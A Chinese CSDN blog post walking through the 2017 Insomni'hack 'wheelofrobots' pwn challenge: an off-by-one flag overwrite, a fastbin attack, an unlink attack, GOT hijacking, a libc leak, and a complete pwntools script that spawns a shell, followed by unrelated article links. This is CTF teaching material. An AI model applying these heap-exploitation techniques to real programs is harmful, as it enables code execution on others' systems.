2017 insomni‘hack wheelofrobots Writeup

最新推荐文章于 2024-06-13 13:50:18 发布
最新推荐文章于 2024-06-13 13:50:18 发布
阅读量1.9k 收藏
点赞数 1
分类专栏: pwn题 文章标签: 安全 web安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Morphy_Amo/article/details/122742585
版权

【pwn学习】堆溢出(三)- Unlink和UAF的相关题目

题目链接

  1. 查看安全策略

    root@kali:~/ctf/Other/pwn/heap# checksec wheelofrobots [*] '/root/ctf/Other/pwn/heap/wheelofrobots'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3ff000)

  2. 静态分析

    • 题目中没有使用malloc,而是使用的calloccalloc会将分配的空间初始化为0

    • 最多可以选择3个机器人

    • 有六种机器人

      • robot -1 : 分配0x14的空间。(20)

      • robot-2:用户输入一个数字n,当n小于4时,分配n*0x14的空间,否则分配0x28的空间

      • robot-3: 用户输入一个数字n,当n小于99时,分配n*0x14的空间,否则分配0x14*0x14的空间

      • robot-4:分配0xfa0字节空间。(4000)

      • robot-5: 分配0x9c40空间。(40000)

      • robot-6: 用户输入一个数字n,分配n*0x14的空间。

      • 如下的地址来表示rotbot是否被选择

        0x603114	- robot 2
0x603118	- robot 4
0x60311c	- robot 6
0x603120	- robot 1
0x603124	- robot 3
0x603128	- robot 5

      • 如下地址存储robot的内存指针

        0x6030e0	- robot 4
0x6030e8	- robot 6
0x6030f0	- robot	2
0x6030f8	- robot	1
0x603100	- robot	3
0x603108	- robot 5

      • 如下地址存储robot的大小系数

        0x603138	- robot 2
0x603140	- robot 3
0x603148	- robot 6

    • 在选择添加的robot型号时,存在off-by-one漏洞。分配给存储用户输入的空间为4个byte,但是写入的时候却可以写入5个字节的内容,从而覆盖0x603114的低字节,即robot2是否被使用的标志位。

    利用上面的分析可以有如下思路

    • 利用off-by-one漏洞,可以篡改robot2的使用标志位。篡改后可以在robot2的chunk释放后利用重新命名的功能覆盖fastbins的fd指针,造成fastbins攻击,从而实现向内存中任意写入。

  3. 动态分析

    • fastbin攻击

      add_robot(2, 1)
del_robot(2)
override_robot2(b'\x01')
# 篡改freed chunk的fd指针
edit_robot(2, p64(0x603138))
override_robot2(b'\x00')
add_robot(2, 1)

      篡改fd指针后,会将0x603138加入到fastbins中

      pwndbg> fastbins
fastbins
0x20: 0x603138 ◂— 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0

      在这种情况下,当glibc申请0x20的大小的chunk时,会把0x603138分配给申请对象。chunk需要size字段,0x603138的下一个地址是robot3的大小系数,因此这里添加一个系数为0x20的robot3

      add_robot(3, 32)
# 申请robot1,获取fastbins
add_robot(1)

      robot1添加后,可以看到robot1的内存指针指向了0x603138 + 0x10的位置。此时向robot1中写入数据时,会直接写入到0x603148,即robot6的大小系数的位置。

      pwndbg> x/gx 0x6030f8
0x6030f8:       0x0000000000603148

      为什么写到0x603138,而不是直接写到0x6030e0开始的robot指针中?

      一个合法的chunk需要有个size字段,写入到0x6030e0位置的话,难以控制下一个地址的值作为size字段。

      到此,我们可以通过覆盖0x603148的值,来绕过写入时的大小限制。可以先创建一个小的robot6,然后将其系数修改为一个大数,这样就可以输入任意长度的内容,造成溢出。

    • 使用Unlink篡改指向robot-6的chunk的指针

      • 首先构造合适的内存分布。要先创建一个小的chunk用来溢出,然后紧跟一个small chunk来触发unlink。

        add_robot(6, 2)
# 创建一个small chunk,大小需要大于0x80
add_robot(3, 7)

      • 修改robot6的大小系数

        edit_robot(1, p64(0x10))

      • 构造溢出的payload写入到robot6,并释放robot3来触发unlink

        robot6ptr = 0x6030e8
forged_chunk = p64(0)
forged_chunk += p64(0x20)
forged_chunk += p64(robot6ptr - 0x18)
forged_chunk += p64(robot6ptr - 0x10)
forged_chunk += p64(0x20)
payload = forged_chunk + p64(0xa0)
edit_robot(6, payload)

del_robot(3)

      • 触发unilnk后,robot-6的指针被覆写为0x6030d0, 当我们向这个地址写入时,就可以修改各个robot的指针,实现任意地址的写入。于是下面我们利用这个能力劫持GOT表,泄露libc基址,最终实现getshell。

      • 在反编译的代码中发现start wheel功能会打印robot的指针

        image-20220129132539314

        在上面静态分析发现,robot4的指针保存在robot6指针的上一个位置,因此我们可以将robot4的真正替换为puts@got,这样就能通过LibcSearcher获取libc基址了。

        • 不过这里还要解决exit,执行start功能后会执行exit退出程序,因此这里还要先劫持exit的got表,使程序继续运行。

          add_robot(4)
# 将exit@got写入到存储robot-4指针的地方
payload = b'a' * 0x10 + p64(ELF.got['exit']) 
edit_robot(6, payload)
# 使用0x40185a覆写exit@got
edit_robot(4, p64(0x40185a)) # 0x40185a会调用打印选项的函数。

        • 进行libc基址的获取。需要注意:最终是否能走到robot-4的分支是随机的,因此需要多运行几次

          leak_func = 'read'
payload = b'a' * 0x10 + p64(ELF.got[leak_func]) 
edit_robot(6, payload)

# 进入start功能,
CONN.recvuntil(b'Wheel Of Robots')
CONN.sendlineafter(b'Your choice : ', b'4')
CONN.recvuntil(b'New hands great!! Thx ')
res = CONN.recvuntil(b'!\n')
# 获取libc
leak_addr = u64(res[:-2].ljust(0x8, b'\x00'))
print(f'\tleak addr: {hex(leak_addr)}')
libc = LibcSearcher(leak_func, leak_addr)
libc_base = leak_addr - libc.dump(leak_func)
print(f'\tlibc base: {hex(libc_base)}')

        • 获取libc基址后的操作就是一个常规操作了。这里我们选择把binsh写入到robot1中,然后通过free(robot1)触发。

          system = libc_base + libc.dump('system')
payload = b'a' * 0x10 + p64(ELF.got['free']) 
edit_robot(6, payload)
edit_robot(4, p64(system))
print('write /bin/sh to robot-1')
del_robot(1)
add_robot(1)
edit_robot(1, b'/bin/sh\n')

print('free robot-1')
del_robot(1)
CONN.interactive()

  4. writeup

    from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'

CONN = process('./wheelofrobots')
ELF = CONN.elf
#gdb.attach(CONN, 'b *0x40162e')

def add_robot(id, n=0):
    CONN.recvuntil(b'Wheel Of Robots')
    CONN.sendlineafter(b'Your choice : ', b'1')
    CONN.recvuntil(b'add to the wheel?')
    CONN.sendlineafter(b'Your choice :', str(id).encode())
    
    if id == 2:
        CONN.sendlineafter(b"Increase Bender's intelligence: ", str(n).encode())
    elif id == 3:
        CONN.sendlineafter(b"Increase Robot Devil's cruelty: ", str(n).encode())
    elif id == 6:
        CONN.sendlineafter(b"Increase Destructor's powerful: ", str(n).encode())

def edit_robot(id, content):
    CONN.recvuntil(b'Wheel Of Robots')
    CONN.sendlineafter(b'Your choice : ', b'3')
    CONN.recvuntil(b'name do you want to change?')
    CONN.sendlineafter(b'Your choice :', str(id).encode())
    CONN.recvuntil(b"Robot's name: \n")
    CONN.send(content)

def del_robot(id):
    CONN.recvuntil(b'Wheel Of Robots')
    CONN.sendlineafter(b'Your choice : ', b'2')
    CONN.recvuntil(b'remove from the wheel?')
    CONN.sendlineafter(b'Your choice :', str(id).encode())

def override_robot2(inuse):
    CONN.recvuntil(b'Wheel Of Robots')
    CONN.sendlineafter(b'Your choice : ', b'1')
    CONN.recvuntil(b'add to the wheel?')                                             
    payload = b'9999' + inuse                                                        
    CONN.sendlineafter(b'Your choice :', payload)                                    
                                                                  
def exp():                                                                           
    # fastbin attack                                                                 
    add_robot(2, 1)                                                                  
    del_robot(2)                                                                     
    override_robot2(b'\x01')
    edit_robot(2, p64(0x603138))
    override_robot2(b'\x00')
    add_robot(2, 1)
    add_robot(3, 32)
    add_robot(1)
    # remove unused wheels
    del_robot(2)
    del_robot(3)

    # unlink
    # override robot-6's size
    add_robot(6, 2)
    edit_robot(1, p64(0x10))
    print('success hijack robot-6 size ') 
    # create next chunk, need to be a small chunk
    add_robot(3, 7) 
    print('\twrite forged chunk')
    robot6ptr = 0x6030e8
    forged_chunk = p64(0)
    forged_chunk += p64(0x20)
    forged_chunk += p64(robot6ptr - 0x18)
    forged_chunk += p64(robot6ptr - 0x10)
    forged_chunk += p64(0x20)
    payload = forged_chunk + p64(0xa0)
    edit_robot(6, payload)
    print('\tfree NEXT CHUNK to trigger unlink')
    del_robot(3)
    print('success hijack robot-6 ptr')
    
    print('Hijack func exit:')
    add_robot(4)
    print('\tOvrride robot-4 ptr with exit@got')
    payload = b'a' * 0x10 + p64(ELF.got['exit']) 
    edit_robot(6, payload)
    print('\tHijack exit@got')
    edit_robot(4, p64(0x40185a))
    
    print('Leak libc base address:')
    print('\toverride robot-4 ptr to leak func')
    leak_func = 'read'
    payload = b'a' * 0x10 + p64(ELF.got[leak_func]) 
    edit_robot(6, payload)
    
    print('\tleak addr')
    CONN.recvuntil(b'Wheel Of Robots')
    CONN.sendlineafter(b'Your choice : ', b'4')
    CONN.recvuntil(b'New hands great!! Thx ')
    res = CONN.recvuntil(b'!\n')
    leak_addr = u64(res[:-2].ljust(0x8, b'\x00'))
    print(f'\tleak addr: {hex(leak_addr)}')
    libc = LibcSearcher(leak_func, leak_addr)
    libc_base = leak_addr - libc.dump(leak_func)
    print(f'\tlibc base: {hex(libc_base)}') 
    system = libc_base + libc.dump('system')
    print(f'\tsystem address: {hex(system)}')

    print('Hijack free@got with system')
    payload = b'a' * 0x10 + p64(ELF.got['free']) 
    edit_robot(6, payload)
    edit_robot(4, p64(system))
    print('write /bin/sh to robot-1')
    del_robot(1)
    add_robot(1)
    edit_robot(1, b'/bin/sh\n')

    print('free robot-1')
    del_robot(1)
    CONN.interactive()

if __name__ == "__main__":
    exp()
Morphy_Amo
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Insomnihack-2015:Insomni'hack 决赛 2015 的存储库
06-15
开发 SH1TTY 侏罗纪Sparc 登录 主谋 去做 取证 Elysium ropchain 分析 -> 硬件 1-2-3-4 移动的 去做 网络 泄漏的时间 去做 倒车 去做 外壳编码 域名 蓝丸 网络 哈克就像是 1999 年! 连环黑客
Python基本内置函数及常用库汇总(加用法)
qq_35572368的博客
02-15 1万+
在初学Python时的基础内置函数汇总   最近暑假想学习Python,为了让自己未来的就业多一分竞争力,也为了让自己掌握多一项技能,于是就去看了大学MOOC嵩天老师的Python程序设计基础。课程内容很不错,讲的细致全面,由浅入深,最后的思维提高也令人深思,但我的脑子老化生锈记不住函数,再加上懒惰不去背记,忘得很快,于是写这个博客帮助自己背记。 此博文后续持续更新中… Python中的33个保留...
Insomnihack CTF-l33t-hoster复现分析
weixin_30776863的博客
07-19 701
题目地址: https://github.com/eboda/insomnihack/tree/master/l33t_hoster 源码如下: <?php if (isset($_GET["source"])) die(highlight_file(__FILE__)); session_start(); if (!isset($_SESSION["ho...
在 Raspberry Pi 4 上安装 PyTorch
weixin_41012767的博客
04-18 2202
本页将指导您在64 位操作系统的 Raspberry Pi 4 上安装PyTorch1.11.0或更早版本、TorchVision、LibTorch和Caffe2 。
Go语言中时间轮的实现
CSDN资讯
02-23 2580
作者 | luozhiyun 责编 | 张文来源 | https://www.luozhiyun.com/archives/444最近在工作中有一个需求,简单来说就是在短时间内会创建...
2017 insomni'hack——wheelofrobots
04-22 179
64位程序,没开PIE  #unlink #off by one #fastbin attack 程序逻辑 大概分析程序,可以得知,这是一个配置机器人轮子的游戏,机器人一共需要添加 3 个轮子。 程序非常依赖的一个功能是读取整数,该函数 read_int 是读取指定的长度,将其转化为 int 类型的数字。 一共有 6 个轮子可以选择 1 void __fastcall...
2017 insomni'hack wheelofrobots
coco的博客
12-04 224
程序分析 是一个64位程序,没有开启PIE。并且是一个菜单式的程序。 add robot 一共有六个robot可以添加。可以看到,添加一个robot,会在bss端上写入一个指向robot name的指针,in use位。并且每次的选择也是写入bss端上。还有一个count来限制add robot的次数,最多3次。 这里有个漏洞。choice读入的时候能向bss端上读入五个字节。观察bss结构的...
2017 insomni'hack wheelofrobots 的 exp
哒君的博客
07-25 302
加深记忆与理解 ctf-wiki #coding:utf-8 from pwn import * context(arch='amd64',os='linux') context.log_level = 'debug' io = process('./wheelofrobots') elf = ELF('./wheelofrobots') libc = ELF('/lib/x86_64-lin...
mongo-experiments:我将使用Docker,DockerCompose,MongoDB和Golang改善我的MongoDBGolang技能的个人项目
03-08
蒙戈实验 我将使用Docker,DockerCompose,MongoDB和Golang的个人项目,以提高我的MongoDB / Golang技能。 ·· 目录 关于该项目 我决定创建一个存储库,使我可以在MongoDB中...使用HTTP客户端(如Postman / Insomni
pywinauto
热门推荐
weixin_42753043的博客
04-04 3万+
pywinauto (仅作为个人笔记,如有雷同,请联系删除。。) ==Pywinauto==是基于Python开发的,用于自动化测试的脚本模块,主要操作于Windows标准图形界面。它可以允许你很容易的发送鼠标、键盘动作给Windows的对话框和控件。 参考:https://www.cnblogs.com/xp1315458571/p/13892205.html 1、安装方式: 命令行安装:pip install pywinauto,简单,方便,直接。 手动安装:【解压缩后执行 python set
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 910
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
《软件定义安全》之八:软件定义安全案例
大龄IT民工
06-13 1069
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
NTFS安全权限
2302_80097039的博客
06-12 515
NTFS权限是基于。
上心师傅的思路分享(三)--Nacos渗透
weixin_72543266的博客
06-10 944
Nacos 是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。但是Nacos是部署在内网的,因此下面通过语法搜索出来的可以看到的,一般会做访问限制的,正常是访问不到的,如果可以访问就可以尝试是否存在漏洞了.当然如果直接在真实环境下测试,一是未授权行为,二是不容易找到复现环境,所以在本地搭建环境来进行复现是最安全,也是最容易。
电子电气架构 ---车载安全防火墙
Soly_kun的博客
06-09 729
车载诊断安全
渗透测试之内核安全系列课程:Rootkit技术初探(三)
fearhacker的专栏
06-08 953
相应的,每个进程,都会存在一个页目录表),1024MB = 1 GB;GDT 全局描述符表、LDT 局部描述符表、GDTR 全局描述符表 寄存器、LDTR 局部描述符表 寄存器 、一致性代码、非一致性代码、实模式、保护模式、线性地址。在 Intel 系列的 芯片中,存在专门的电路,负责将虚拟地址(线性地址)转译为内存物理地址!目前这块,笔者本人,也需要更加深入的理解,也许以后,会涉及到对这方面的更详细讲解 )。想要免杀,需要了解的安全技术知识包括软件加壳、代码混淆(例如,使用花指令)、隐匿技术(例如,
渗透测试之内核安全系列课程:Rootkit技术初探(四)
fearhacker的专栏
06-10 1008
当 PDE( 页目录项 ) 的 PS 位( 第8位 ) 为 1 时,代表PDE( 页目录项 )直接指向页( P ),这时,页的大小为 4MB(这是一个大页),此时,这个大页( 4MB 大小的物理页)的物理地址计算公式为: PDE( 页目录项 ) 的 高 10 位 + 线性地址 的 低 22 位。上述的页目录( PDT )的子项(PDE)除了前7位之外,其它各比特位用途不固定(各关键比特位的位置,同样不固定),因操作系统类型、CPU 版本不同而存在差异!
内网安全--隧道技术&代理技术
金灰的博客
06-06 1450
注:本文仅做技术分享,请勿非法破坏...隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) 硬刚网络协议的封杀!代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作) 本地代理外网流量.
精彩回顾!安全智能体的前沿技术研究与实践
m0_73736695的博客
06-13 726
云起无垠创始人兼CEO沈凯文博士,以《安全智能体的前沿技术研究与实践》为题,深入剖析了安全检测技术的演进历程,以及安全智能体的核心理念和实际应用。
智慧守护 畅游无忧——北斗应急呼叫柱,为景区安全加码
最新发布
广州磐钴智能的博客
06-13 655
智能部署,全面覆盖。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Morphy_Amo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值